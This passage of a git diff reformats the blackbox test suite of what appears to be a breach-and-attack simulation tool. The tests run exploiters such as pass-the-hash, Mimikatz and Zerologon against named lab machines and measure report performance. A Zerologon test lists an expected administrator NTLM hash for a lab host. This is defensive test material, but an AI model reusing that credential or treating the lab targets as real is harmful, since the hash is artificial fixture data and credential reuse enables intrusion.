WmiMimikatz from envs.monkey_zoo.blackbox.config_templates.wmi_pth import WmiPth from envs.monkey_zoo.blackbox.config_templates.zerologon import Zerologon -from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import \ - TestLogsHandler +from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import TestLogsHandler from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest -from envs.monkey_zoo.blackbox.tests.performance.map_generation import \ - MapGenerationTest -from envs.monkey_zoo.blackbox.tests.performance.map_generation_from_telemetries import \ - MapGenerationFromTelemetryTest -from envs.monkey_zoo.blackbox.tests.performance.report_generation import \ - ReportGenerationTest -from envs.monkey_zoo.blackbox.tests.performance.report_generation_from_telemetries import \ - ReportGenerationFromTelemetryTest -from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import \ - TelemetryPerformanceTest +from envs.monkey_zoo.blackbox.tests.performance.map_generation import MapGenerationTest +from envs.monkey_zoo.blackbox.tests.performance.map_generation_from_telemetries import ( + MapGenerationFromTelemetryTest, +) +from envs.monkey_zoo.blackbox.tests.performance.report_generation import ReportGenerationTest +from envs.monkey_zoo.blackbox.tests.performance.report_generation_from_telemetries import ( + ReportGenerationFromTelemetryTest, +) +from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test import ( + TelemetryPerformanceTest, +) from envs.monkey_zoo.blackbox.utils import gcp_machine_handlers -DEFAULT_TIMEOUT_SECONDS = 5*60 +DEFAULT_TIMEOUT_SECONDS = 5 * 60 MACHINE_BOOTUP_WAIT_SECONDS = 30 -GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'hadoop-2', 'hadoop-3', 'mssql-16', - 'mimikatz-14', 'mimikatz-15', 'struts2-23', 'struts2-24', 'tunneling-9', 'tunneling-10', - 'tunneling-11', 'tunneling-12', 'weblogic-18', 'weblogic-19', 'shellshock-8', 'zerologon-25', - 'drupal-28'] +GCP_TEST_MACHINE_LIST = [ + "sshkeys-11", + "sshkeys-12", + "elastic-4", + "elastic-5", + "hadoop-2", + "hadoop-3", + "mssql-16", + "mimikatz-14", + "mimikatz-15", + "struts2-23", + "struts2-24", + "tunneling-9", + "tunneling-10", + "tunneling-11", + "tunneling-12", + "weblogic-18", + "weblogic-19", + "shellshock-8", + "zerologon-25", + "drupal-28", +] LOG_DIR_PATH = "./logs" logging.basicConfig(level=logging.INFO) LOGGER = logging.getLogger(__name__) -@pytest.fixture(autouse=True, scope='session') +@pytest.fixture(autouse=True, scope="session") def GCPHandler(request, no_gcp): if not no_gcp: GCPHandler = gcp_machine_handlers.GCPHandler() @@ -67,7 +82,7 @@ def GCPHandler(request, no_gcp): request.addfinalizer(fin) -@pytest.fixture(autouse=True, scope='session') +@pytest.fixture(autouse=True, scope="session") def delete_logs(): LOGGER.info("Deleting monkey logs before new tests.") TestLogsHandler.delete_log_folder_contents(TestMonkeyBlackbox.get_log_dir_path()) @@ -77,7 +92,7 @@ def wait_machine_bootup(): sleep(MACHINE_BOOTUP_WAIT_SECONDS) -@pytest.fixture(scope='class') +@pytest.fixture(scope="class") def island_client(island, quick_performance_tests): island_client_object = MonkeyIslandClient(island) if not quick_performance_tests: @@ -85,41 +100,55 @@ def island_client(island, quick_performance_tests): yield island_client_object -@pytest.mark.usefixtures('island_client') +@pytest.mark.usefixtures("island_client") # noinspection PyUnresolvedReferences class TestMonkeyBlackbox: - @staticmethod - def run_exploitation_test(island_client: MonkeyIslandClient, - config_template: Type[ConfigTemplate], - test_name: str, - timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS): + def run_exploitation_test( + island_client: MonkeyIslandClient, + config_template: Type[ConfigTemplate], + test_name: str, + timeout_in_seconds=DEFAULT_TIMEOUT_SECONDS, + ): raw_config = IslandConfigParser.get_raw_config(config_template, island_client) - analyzer = CommunicationAnalyzer(island_client, - IslandConfigParser.get_ips_of_targets(raw_config)) - log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path()) + analyzer = CommunicationAnalyzer( + island_client, IslandConfigParser.get_ips_of_targets(raw_config) + ) + log_handler = TestLogsHandler( + test_name, island_client, TestMonkeyBlackbox.get_log_dir_path() + ) ExploitationTest( name=test_name, island_client=island_client, raw_config=raw_config, analyzers=[analyzer], timeout=timeout_in_seconds, - log_handler=log_handler).run() + log_handler=log_handler, + ).run() @staticmethod - def run_performance_test(performance_test_class, island_client, - config_template, timeout_in_seconds, break_on_timeout=False): + def run_performance_test( + performance_test_class, + island_client, + config_template, + timeout_in_seconds, + break_on_timeout=False, + ): raw_config = IslandConfigParser.get_raw_config(config_template, island_client) - log_handler = TestLogsHandler(performance_test_class.TEST_NAME, - island_client, - TestMonkeyBlackbox.get_log_dir_path()) - analyzers = [CommunicationAnalyzer(island_client, IslandConfigParser.get_ips_of_targets(raw_config))] - performance_test_class(island_client=island_client, - raw_config=raw_config, - analyzers=analyzers, - timeout=timeout_in_seconds, - log_handler=log_handler, - break_on_timeout=break_on_timeout).run() + log_handler = TestLogsHandler( + performance_test_class.TEST_NAME, island_client, TestMonkeyBlackbox.get_log_dir_path() + ) + analyzers = [ + CommunicationAnalyzer(island_client, IslandConfigParser.get_ips_of_targets(raw_config)) + ] + performance_test_class( + island_client=island_client, + raw_config=raw_config, + analyzers=analyzers, + timeout=timeout_in_seconds, + log_handler=log_handler, + break_on_timeout=break_on_timeout, + ).run() @staticmethod def get_log_dir_path(): @@ -138,7 +167,9 @@ class TestMonkeyBlackbox: TestMonkeyBlackbox.run_exploitation_test(island_client, Mssql, "MSSQL_exploiter") def test_smb_and_mimikatz_exploiters(self, island_client): - TestMonkeyBlackbox.run_exploitation_test(island_client, SmbMimikatz, "SMB_exploiter_mimikatz") + TestMonkeyBlackbox.run_exploitation_test( + island_client, SmbMimikatz, "SMB_exploiter_mimikatz" + ) def test_smb_pth(self, island_client): TestMonkeyBlackbox.run_exploitation_test(island_client, SmbPth, "SMB_PTH") @@ -159,31 +190,42 @@ class TestMonkeyBlackbox: TestMonkeyBlackbox.run_exploitation_test(island_client, ShellShock, "Shellschock_exploiter") def test_tunneling(self, island_client): - TestMonkeyBlackbox.run_exploitation_test(island_client, Tunneling, "Tunneling_exploiter", 15 * 60) + TestMonkeyBlackbox.run_exploitation_test( + island_client, Tunneling, "Tunneling_exploiter", 15 * 60 + ) def test_wmi_and_mimikatz_exploiters(self, island_client): - TestMonkeyBlackbox.run_exploitation_test(island_client, WmiMimikatz, "WMI_exploiter,_mimikatz") + TestMonkeyBlackbox.run_exploitation_test( + island_client, WmiMimikatz, "WMI_exploiter,_mimikatz" + ) def test_wmi_pth(self, island_client): TestMonkeyBlackbox.run_exploitation_test(island_client, WmiPth, "WMI_PTH") def test_zerologon_exploiter(self, island_client): test_name = "Zerologon_exploiter" - expected_creds = ["Administrator", - "aad3b435b51404eeaad3b435b51404ee", - "2864b62ea4496934a5d6e86f50b834a5"] + expected_creds = [ + "Administrator", + "aad3b435b51404eeaad3b435b51404ee", + "2864b62ea4496934a5d6e86f50b834a5", + ] raw_config = IslandConfigParser.get_raw_config(Zerologon, island_client) analyzer = ZerologonAnalyzer(island_client, expected_creds) - log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path()) + log_handler = TestLogsHandler( + test_name, island_client, TestMonkeyBlackbox.get_log_dir_path() + ) ExploitationTest( name=test_name, island_client=island_client, raw_config=raw_config, analyzers=[analyzer], timeout=DEFAULT_TIMEOUT_SECONDS, - log_handler=log_handler).run() + log_handler=log_handler, + ).run() - @pytest.mark.skip(reason="Perfomance test that creates env from fake telemetries is faster, use that instead.") + @pytest.mark.skip( + reason="Perfomance test that creates env from fake telemetries is faster, use that instead." + ) def test_report_generation_performance(self, island_client, quick_performance_tests): """ This test includes the SSH + Elastic + Hadoop + MSSQL machines all in one test @@ -193,21 +235,21 @@ class TestMonkeyBlackbox: and the Timing one which checks how long the report took to execute """ if not quick_performance_tests: - TestMonkeyBlackbox.run_performance_test(ReportGenerationTest, - island_client, - Performance, - timeout_in_seconds=10*60) + TestMonkeyBlackbox.run_performance_test( + ReportGenerationTest, island_client, Performance, timeout_in_seconds=10 * 60 + ) else: LOGGER.error("This test doesn't support 'quick_performance_tests' option.") assert False - @pytest.mark.skip(reason="Perfomance test that creates env from fake telemetries is faster, use that instead.") + @pytest.mark.skip( + reason="Perfomance test that creates env from fake telemetries is faster, use that instead." + ) def test_map_generation_performance(self, island_client, quick_performance_tests): if not quick_performance_tests: - TestMonkeyBlackbox.run_performance_test(MapGenerationTest, - island_client, - "PERFORMANCE.conf", - timeout_in_seconds=10*60) + TestMonkeyBlackbox.run_performance_test( + MapGenerationTest, island_client, "PERFORMANCE.conf", timeout_in_seconds=10 * 60 + ) else: LOGGER.error("This test doesn't support 'quick_performance_tests' option.") assert False @@ -219,4 +261,6 @@ class TestMonkeyBlackbox: MapGenerationFromTelemetryTest(island_client, quick_performance_tests).run() def test_telem_performance(self, island_client, quick_performance_tests): - TelemetryPerformanceTest(island_client, quick_performance_tests).test_telemetry_performance() + TelemetryPerformanceTest( + island_client, quick_performance_tests + ).test_telemetry_performance() diff --git a/envs/monkey_zoo/blackbox/tests/basic_test.py b/envs/monkey_zoo/blackbox/tests/basic_test.py index fa722ffb7..7bec9c873 100644 --- a/envs/monkey_zoo/blackbox/tests/basic_test.py +++ b/envs/monkey_zoo/blackbox/tests/basic_test.py @@ -2,7 +2,6 @@ import abc class BasicTest(abc.ABC): - @abc.abstractmethod def run(self): pass diff --git a/envs/monkey_zoo/blackbox/tests/exploitation.py b/envs/monkey_zoo/blackbox/tests/exploitation.py index d6332bc75..e3397b949 100644 --- a/envs/monkey_zoo/blackbox/tests/exploitation.py +++ b/envs/monkey_zoo/blackbox/tests/exploitation.py @@ -13,7 +13,6 @@ LOGGER = logging.getLogger(__name__) class ExploitationTest(BasicTest): - def __init__(self, name, island_client, raw_config, analyzers, timeout, log_handler): self.name = name self.island_client = island_client @@ -48,18 +47,25 @@ class ExploitationTest(BasicTest): self.log_success(timer) return sleep(DELAY_BETWEEN_ANALYSIS) - LOGGER.debug("Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken())) + LOGGER.debug( + "Waiting until all analyzers passed. Time passed: {}".format(timer.get_time_taken()) + ) self.log_failure(timer) assert False def log_success(self, timer): LOGGER.info(self.get_analyzer_logs()) - LOGGER.info("{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken())) + LOGGER.info( + "{} test passed, time taken: {:.1f} seconds.".format(self.name, timer.get_time_taken()) + ) def log_failure(self, timer): LOGGER.info(self.get_analyzer_logs()) - LOGGER.error("{} test failed because of timeout. Time taken: {:.1f} seconds.".format(self.name, - timer.get_time_taken())) + LOGGER.error( + "{} test failed because of timeout. Time taken: {:.1f} seconds.".format( + self.name, timer.get_time_taken() + ) + ) def all_analyzers_pass(self): analyzers_results = [analyzer.analyze_test_results() for analyzer in self.analyzers] @@ -73,7 +79,10 @@ class ExploitationTest(BasicTest): def wait_until_monkeys_die(self): time_passed = 0 - while not self.island_client.is_all_monkeys_dead() and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE: + while ( + not self.island_client.is_all_monkeys_dead() + and time_passed < MAX_TIME_FOR_MONKEYS_TO_DIE + ): sleep(WAIT_TIME_BETWEEN_REQUESTS) time_passed += WAIT_TIME_BETWEEN_REQUESTS LOGGER.debug("Waiting for all monkeys to die. Time passed: {}".format(time_passed)) diff --git a/envs/monkey_zoo/blackbox/tests/performance/endpoint_performance_test.py b/envs/monkey_zoo/blackbox/tests/performance/endpoint_performance_test.py index b8793452d..1e2345ecf 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/endpoint_performance_test.py +++ b/envs/monkey_zoo/blackbox/tests/performance/endpoint_performance_test.py @@ -10,7 +10,6 @@ LOGGER = logging.getLogger(__name__) class EndpointPerformanceTest(BasicTest): - def __init__(self, name, test_config: PerformanceTestConfig, island_client: MonkeyIslandClient): self.name = name self.test_config = test_config @@ -21,8 +20,9 @@ class EndpointPerformanceTest(BasicTest): endpoint_timings = {} for endpoint in self.test_config.endpoints_to_test: self.island_client.clear_caches() - endpoint_timings[endpoint] = self.island_client.requests.get_request_time(endpoint, - SupportedRequestMethod.GET) + endpoint_timings[endpoint] = self.island_client.requests.get_request_time( + endpoint, SupportedRequestMethod.GET + ) analyzer = PerformanceAnalyzer(self.test_config, endpoint_timings) return analyzer.analyze_test_results() diff --git a/envs/monkey_zoo/blackbox/tests/performance/map_generation.py b/envs/monkey_zoo/blackbox/tests/performance/map_generation.py index 42d2265e7..f925f031d 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/map_generation.py +++ b/envs/monkey_zoo/blackbox/tests/performance/map_generation.py @@ -3,7 +3,9 @@ from datetime import timedelta from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig -from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import PerformanceTestWorkflow +from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import ( + PerformanceTestWorkflow, +) MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2) MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5) @@ -17,18 +19,22 @@ class MapGenerationTest(PerformanceTest): TEST_NAME = "Map generation performance test" - def __init__(self, island_client, raw_config, analyzers, - timeout, log_handler, break_on_timeout): + def __init__( + self, island_client, raw_config, analyzers, timeout, log_handler, break_on_timeout + ): self.island_client = island_client - exploitation_test = ExploitationTest(MapGenerationTest.TEST_NAME, island_client, - raw_config, analyzers, timeout, log_handler) - performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, - max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, - endpoints_to_test=MAP_RESOURCES, - break_on_timeout=break_on_timeout) - self.performance_test_workflow = PerformanceTestWorkflow(MapGenerationTest.TEST_NAME, - exploitation_test, - performance_config) + exploitation_test = ExploitationTest( + MapGenerationTest.TEST_NAME, island_client, raw_config, analyzers, timeout, log_handler + ) + performance_config = PerformanceTestConfig( + max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, + max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, + endpoints_to_test=MAP_RESOURCES, + break_on_timeout=break_on_timeout, + ) + self.performance_test_workflow = PerformanceTestWorkflow( + MapGenerationTest.TEST_NAME, exploitation_test, performance_config + ) def run(self): self.performance_test_workflow.run() diff --git a/envs/monkey_zoo/blackbox/tests/performance/map_generation_from_telemetries.py b/envs/monkey_zoo/blackbox/tests/performance/map_generation_from_telemetries.py index 1b31a8962..8713d3c0f 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/map_generation_from_telemetries.py +++ b/envs/monkey_zoo/blackbox/tests/performance/map_generation_from_telemetries.py @@ -2,8 +2,9 @@ from datetime import timedelta from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig -from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import \ - TelemetryPerformanceTestWorkflow +from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import ( + TelemetryPerformanceTestWorkflow, +) MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2) MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5) @@ -19,14 +20,18 @@ class MapGenerationFromTelemetryTest(PerformanceTest): def __init__(self, island_client, quick_performance_test: bool, break_on_timeout=False): self.island_client = island_client - performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, - max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, - endpoints_to_test=MAP_RESOURCES, - break_on_timeout=break_on_timeout) - self.performance_test_workflow = TelemetryPerformanceTestWorkflow(MapGenerationFromTelemetryTest.TEST_NAME, - self.island_client, - performance_config, - quick_performance_test) + performance_config = PerformanceTestConfig( + max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, + max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, + endpoints_to_test=MAP_RESOURCES, + break_on_timeout=break_on_timeout, + ) + self.performance_test_workflow = TelemetryPerformanceTestWorkflow( + MapGenerationFromTelemetryTest.TEST_NAME, + self.island_client, + performance_config, + quick_performance_test, + ) def run(self): self.performance_test_workflow.run() diff --git a/envs/monkey_zoo/blackbox/tests/performance/performance_test.py b/envs/monkey_zoo/blackbox/tests/performance/performance_test.py index dd6af8065..de5d49945 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/performance_test.py +++ b/envs/monkey_zoo/blackbox/tests/performance/performance_test.py @@ -4,10 +4,10 @@ from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest class PerformanceTest(BasicTest, metaclass=ABCMeta): - @abstractmethod - def __init__(self, island_client, raw_config, analyzers, - timeout, log_handler, break_on_timeout): + def __init__( + self, island_client, raw_config, analyzers, timeout, log_handler, break_on_timeout + ): pass @property diff --git a/envs/monkey_zoo/blackbox/tests/performance/performance_test_config.py b/envs/monkey_zoo/blackbox/tests/performance/performance_test_config.py index ad7be5967..cc45093c0 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/performance_test_config.py +++ b/envs/monkey_zoo/blackbox/tests/performance/performance_test_config.py @@ -3,9 +3,13 @@ from typing import List class PerformanceTestConfig: - - def __init__(self, max_allowed_single_page_time: timedelta, max_allowed_total_time: timedelta, - endpoints_to_test: List[str] = None, break_on_timeout=False): + def __init__( + self, + max_allowed_single_page_time: timedelta, + max_allowed_total_time: timedelta, + endpoints_to_test: List[str] = None, + break_on_timeout=False, + ): self.max_allowed_single_page_time = max_allowed_single_page_time self.max_allowed_total_time = max_allowed_total_time self.endpoints_to_test = endpoints_to_test diff --git a/envs/monkey_zoo/blackbox/tests/performance/performance_test_workflow.py b/envs/monkey_zoo/blackbox/tests/performance/performance_test_workflow.py index 7799e3d29..de63ed899 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/performance_test_workflow.py +++ b/envs/monkey_zoo/blackbox/tests/performance/performance_test_workflow.py @@ -1,12 +1,15 @@ from envs.monkey_zoo.blackbox.tests.basic_test import BasicTest from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest -from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import EndpointPerformanceTest +from envs.monkey_zoo.blackbox.tests.performance.endpoint_performance_test import ( + EndpointPerformanceTest, +) from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig class PerformanceTestWorkflow(BasicTest): - - def __init__(self, name, exploitation_test: ExploitationTest, performance_config: PerformanceTestConfig): + def __init__( + self, name, exploitation_test: ExploitationTest, performance_config: PerformanceTestConfig + ): self.name = name self.exploitation_test = exploitation_test self.island_client = exploitation_test.island_client @@ -25,7 +28,9 @@ class PerformanceTestWorkflow(BasicTest): self.exploitation_test.wait_for_monkey_process_to_finish() if not self.island_client.is_all_monkeys_dead(): raise RuntimeError("Can't test report times since not all Monkeys have died.") - performance_test = EndpointPerformanceTest(self.name, self.performance_config, self.island_client) + performance_test = EndpointPerformanceTest( + self.name, self.performance_config, self.island_client + ) try: if not self.island_client.is_all_monkeys_dead(): raise RuntimeError("Can't test report times since not all Monkeys have died.") diff --git a/envs/monkey_zoo/blackbox/tests/performance/report_generation.py b/envs/monkey_zoo/blackbox/tests/performance/report_generation.py index f05661682..c7efc6057 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/report_generation.py +++ b/envs/monkey_zoo/blackbox/tests/performance/report_generation.py @@ -3,7 +3,9 @@ from datetime import timedelta from envs.monkey_zoo.blackbox.tests.exploitation import ExploitationTest from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig -from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import PerformanceTestWorkflow +from envs.monkey_zoo.blackbox.tests.performance.performance_test_workflow import ( + PerformanceTestWorkflow, +) MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2) MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5) @@ -13,25 +15,34 @@ REPORT_RESOURCES = [ "api/attack/report", "api/report/zero_trust/findings", "api/report/zero_trust/principles", - "api/report/zero_trust/pillars" + "api/report/zero_trust/pillars", ] class ReportGenerationTest(PerformanceTest): TEST_NAME = "Report generation performance test" - def __init__(self, island_client, raw_config, analyzers, - timeout, log_handler, break_on_timeout): + def __init__( + self, island_client, raw_config, analyzers, timeout, log_handler, break_on_timeout + ): self.island_client = island_client - exploitation_test = ExploitationTest(ReportGenerationTest.TEST_NAME, island_client, - raw_config, analyzers, timeout, log_handler) - performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, - max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, - endpoints_to_test=REPORT_RESOURCES, - break_on_timeout=break_on_timeout) - self.performance_test_workflow = PerformanceTestWorkflow(ReportGenerationTest.TEST_NAME, - exploitation_test, - performance_config) + exploitation_test = ExploitationTest( + ReportGenerationTest.TEST_NAME, + island_client, + raw_config, + analyzers, + timeout, + log_handler, + ) + performance_config = PerformanceTestConfig( + max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, + max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, + endpoints_to_test=REPORT_RESOURCES, + break_on_timeout=break_on_timeout, + ) + self.performance_test_workflow = PerformanceTestWorkflow( + ReportGenerationTest.TEST_NAME, exploitation_test, performance_config + ) def run(self): self.performance_test_workflow.run() diff --git a/envs/monkey_zoo/blackbox/tests/performance/report_generation_from_telemetries.py b/envs/monkey_zoo/blackbox/tests/performance/report_generation_from_telemetries.py index abc2b35c2..59c7e1848 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/report_generation_from_telemetries.py +++ b/envs/monkey_zoo/blackbox/tests/performance/report_generation_from_telemetries.py @@ -2,8 +2,9 @@ from datetime import timedelta from envs.monkey_zoo.blackbox.tests.performance.performance_test import PerformanceTest from envs.monkey_zoo.blackbox.tests.performance.performance_test_config import PerformanceTestConfig -from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import \ - TelemetryPerformanceTestWorkflow +from envs.monkey_zoo.blackbox.tests.performance.telemetry_performance_test_workflow import ( + TelemetryPerformanceTestWorkflow, +) MAX_ALLOWED_SINGLE_PAGE_TIME = timedelta(seconds=2) MAX_ALLOWED_TOTAL_TIME = timedelta(seconds=5) @@ -13,7 +14,7 @@ REPORT_RESOURCES = [ "api/attack/report", "api/report/zero_trust/findings", "api/report/zero_trust/principles", - "api/report/zero_trust/pillars" + "api/report/zero_trust/pillars", ] @@ -23,14 +24,18 @@ class ReportGenerationFromTelemetryTest(PerformanceTest): def __init__(self, island_client, quick_performance_test, break_on_timeout=False): self.island_client = island_client - performance_config = PerformanceTestConfig(max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, - max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, - endpoints_to_test=REPORT_RESOURCES, - break_on_timeout=break_on_timeout) - self.performance_test_workflow = TelemetryPerformanceTestWorkflow(ReportGenerationFromTelemetryTest.TEST_NAME, - self.island_client, - performance_config, - quick_performance_test) + performance_config = PerformanceTestConfig( + max_allowed_single_page_time=MAX_ALLOWED_SINGLE_PAGE_TIME, + max_allowed_total_time=MAX_ALLOWED_TOTAL_TIME, + endpoints_to_test=REPORT_RESOURCES, + break_on_timeout=break_on_timeout, + ) + self.performance_test_workflow = TelemetryPerformanceTestWorkflow( + ReportGenerationFromTelemetryTest.TEST_NAME, + self.island_client, + performance_config, + quick_performance_test, + ) def run(self): self.performance_test_workflow.run() diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_file_parser.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_file_parser.py index 0f0c3311f..42a851405 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_file_parser.py +++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_file_parser.py @@ -5,39 +5,43 @@ from typing import Dict, List from tqdm import tqdm -TELEM_DIR_PATH = './tests/performance/telem_sample' +TELEM_DIR_PATH = "./tests/performance/telem_sample" MAX_SAME_TYPE_TELEM_FILES = 10000 LOGGER = logging.getLogger(__name__) class SampleFileParser: - @staticmethod def save_teletries_to_files(telems: List[Dict]): - for telem in (tqdm(telems, desc="Telemetries saved to files", position=3)): + for telem in tqdm(telems, desc="Telemetries saved to files", position=3): SampleFileParser.save_telemetry_to_file(telem) @staticmethod def save_telemetry_to_file(telem: Dict): - telem_filename = telem['name'] + telem['method'] + telem_filename = telem["name"] + telem["method"] for i in range(MAX_SAME_TYPE_TELEM_FILES): if not path.exists(path.join(TELEM_DIR_PATH, (str(i) + telem_filename))): telem_filename = str(i) + telem_filename break - with open(path.join(TELEM_DIR_PATH, telem_filename), 'w') as file: + with open(path.join(TELEM_DIR_PATH, telem_filename), "w") as file: file.write(json.dumps(telem)) @staticmethod def read_telem_files() -> List[str]: telems = [] try: - file_paths = [path.join(TELEM_DIR_PATH, f) for f in listdir(TELEM_DIR_PATH) - if path.isfile(path.join(TELEM_DIR_PATH, f))] + file_paths = [ + path.join(TELEM_DIR_PATH, f) + for f in listdir(TELEM_DIR_PATH) + if path.isfile(path.join(TELEM_DIR_PATH, f)) + ] except FileNotFoundError: - raise FileNotFoundError("Telemetries to send not found. " - "Refer to readme to figure out how to generate telemetries and where to put them.") + raise FileNotFoundError( + "Telemetries to send not found. " + "Refer to readme to figure out how to generate telemetries and where to put them." + ) for file_path in file_paths: - with open(file_path, 'r') as telem_file: + with open(file_path, "r") as telem_file: telem_string = "".join(telem_file.readlines()).replace("\n", "") telems.append(telem_string) return telems diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_ip_generator.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_ip_generator.py index 90422f9a0..70bb69de4 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_ip_generator.py +++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_ip_generator.py @@ -8,7 +8,7 @@ class FakeIpGenerator: def generate_fake_ips_for_real_ips(self, real_ips: List[str]) -> List[str]: fake_ips = [] for i in range(len(real_ips)): - fake_ips.append('.'.join(str(part) for part in self.fake_ip_parts)) + fake_ips.append(".".join(str(part) for part in self.fake_ip_parts)) self.increment_ip() return fake_ips @@ -19,7 +19,7 @@ class FakeIpGenerator: def try_fix_ip_range(self): for i in range(len(self.fake_ip_parts)): if self.fake_ip_parts[i] > 256: - if i-1 < 0: + if i - 1 < 0: raise Exception("Fake IP's out of range.") - self.fake_ip_parts[i-1] += 1 + self.fake_ip_parts[i - 1] += 1 self.fake_ip_parts[i] = 1 diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py index efee81227..2a39e6353 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py +++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/fake_monkey.py @@ -1,7 +1,8 @@ import random -from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import \ - FakeIpGenerator +from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import ( + FakeIpGenerator, +) class FakeMonkey: diff --git a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py index cb5956025..7a1fb4032 100644 --- a/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py +++ b/envs/monkey_zoo/blackbox/tests/performance/telem_sample_parsing/sample_multiplier/sample_multiplier.py @@ -6,24 +6,28 @@ from typing import Dict, List from tqdm import tqdm -from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import SampleFileParser -from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import \ - FakeIpGenerator -from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import FakeMonkey +from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_file_parser import ( + SampleFileParser, +) +from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_ip_generator import ( + FakeIpGenerator, +) +from envs.monkey_zoo.blackbox.tests.performance.telem_sample_parsing.sample_multiplier.fake_monkey import ( + FakeMonkey, +) -TELEM_DIR_PATH = './tests/performance/telemetry_sample' +TELEM_DIR_PATH = "./tests/performance/telemetry_sample" LOGGER = logging.getLogger(__name__) class SampleMultiplier: - def __init__(self, multiplier: int): self.multiplier = multiplier self.fake_ip_generator = FakeIpGenerator() def multiply_telems(self): telems = SampleFileParser.get_all_telemetries() - telem_contents = [json.loads(telem['content']) for telem in telems] + telem_contents = [json.loads(telem["content"]) for telem in telems] monkeys = self.get_monkeys_from_telems(telem_contents) for i in tqdm(range(self.multiplier), desc="Batch of fabricated telemetries", position=1): for monkey in monkeys: @@ -40,46 